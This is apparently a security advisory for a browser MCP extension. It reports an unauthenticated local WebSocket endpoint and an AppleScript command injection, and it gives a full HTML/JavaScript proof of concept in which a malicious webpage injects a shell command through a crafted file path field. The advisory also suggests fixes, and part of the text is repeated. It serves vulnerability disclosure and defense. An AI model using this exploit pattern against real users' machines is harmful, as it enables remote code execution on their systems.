This vulnerability is found by Zeyu Luo security researcher,Songwu security researcher,Dr. CAO Yinfeng, Kevin – The Hong Kong Polytechnic University / HKCT Institute of Higher Education
The node serve in this extention can be accessed without authorization.Besides there is a command injection in AppleScript.So if user ,whose broswer installed this mcp extension,access the malicious website ,a Remote Code Execution can happen.
unauthorized access:
this.server.on("upgrade", (request: IncomingMessage, socket: Socket, head: Buffer) => { if (request.url === "/extension-ws") { this.wss.handleUpgrade(request, socket, head, (ws: WebSocket) => { this.wss.emit("connection", ws, request); // ← access any connection }); } });
command injection:
const appleScript =
set imagePath to "${fullPath}" // ← user can control
...
; exec(osascript -e '${appleScript}', ...); // ← command injection
poc:
`
<title>WebSocket Test</title>
WebSocket Test Page
Check the console for logs.
<script>
// 1. WebSocket 连接 Node Server
const ws = new WebSocket('ws://127.0.0.1:3025/extension-ws');
ws.onopen = function() {
console.log('WebSocket connection established.');
// 2. 连接 ws 成功后,访问 Node Server 截图接口触发 ws 消息
fetch('http://127.0.0.1:3025/capture-screenshot',
{
method: 'POST',
mode: 'no-cors' // 此处使用 no-cors 强制发送跨域请求
}).then(() => console.log('Capture screenshot request sent.'))
.catch(err => console.error('Error sending capture screenshot request:', err));
};
ws.onmessage = function(event) {
console.log('Message from server:', event.data);
try {
const message = JSON.parse(event.data);
if (message.type === 'take-screenshot' && message.requestId) {
console.log('Received take-screenshot request. Responding...');
// 3. 收到 ws 消息后,回复 payload
const response = {
type: "screenshot-data",
data: "1234",
path: "/Users/xiaoming/' || echo 'hacked by notwolf' > /Users/xiaoming/hack.txt || '",
autoPaste: true
};
ws.send(JSON.stringify(response));
console.log('Response sent:', response);
}
} catch (e) {
console.error('Error parsing message or sending response:', e);
}
};
ws.onclose = function() {
console.log('WebSocket connection closed.');
};
ws.onerror = function(error) {
console.error('WebSocket Error: ', error);
};
</script>
`
fix suggestion:
Add Origin whitelist validation and random Secret Token verification in the upgrade event handler
Never use exec()with user-controlled string concatenation
This vulnerability is found by Zeyu Luo security researcher,Songwu security researcher,Dr. CAO Yinfeng, Kevin – The Hong Kong Polytechnic University / HKCT Institute of Higher Education
The node serve in this extention can be accessed without authorization.Besides there is a command injection in AppleScript.So if user ,whose broswer installed this mcp extension,access the malicious website ,a Remote Code Execution can happen.
unauthorized access:
this.server.on("upgrade", (request: IncomingMessage, socket: Socket, head: Buffer) => { if (request.url === "/extension-ws") { this.wss.handleUpgrade(request, socket, head, (ws: WebSocket) => { this.wss.emit("connection", ws, request); // ← access any connection }); } });command injection:
const appleScript =set imagePath to "${fullPath}" // ← user can control
...
; exec(osascript -e '${appleScript}', ...); // ← command injectionpoc:
`
<title>WebSocket Test</title>WebSocket Test Page
Check the console for logs.
fix suggestion:
Add Origin whitelist validation and random Secret Token verification in the upgrade event handler
Never use exec()with user-controlled string concatenation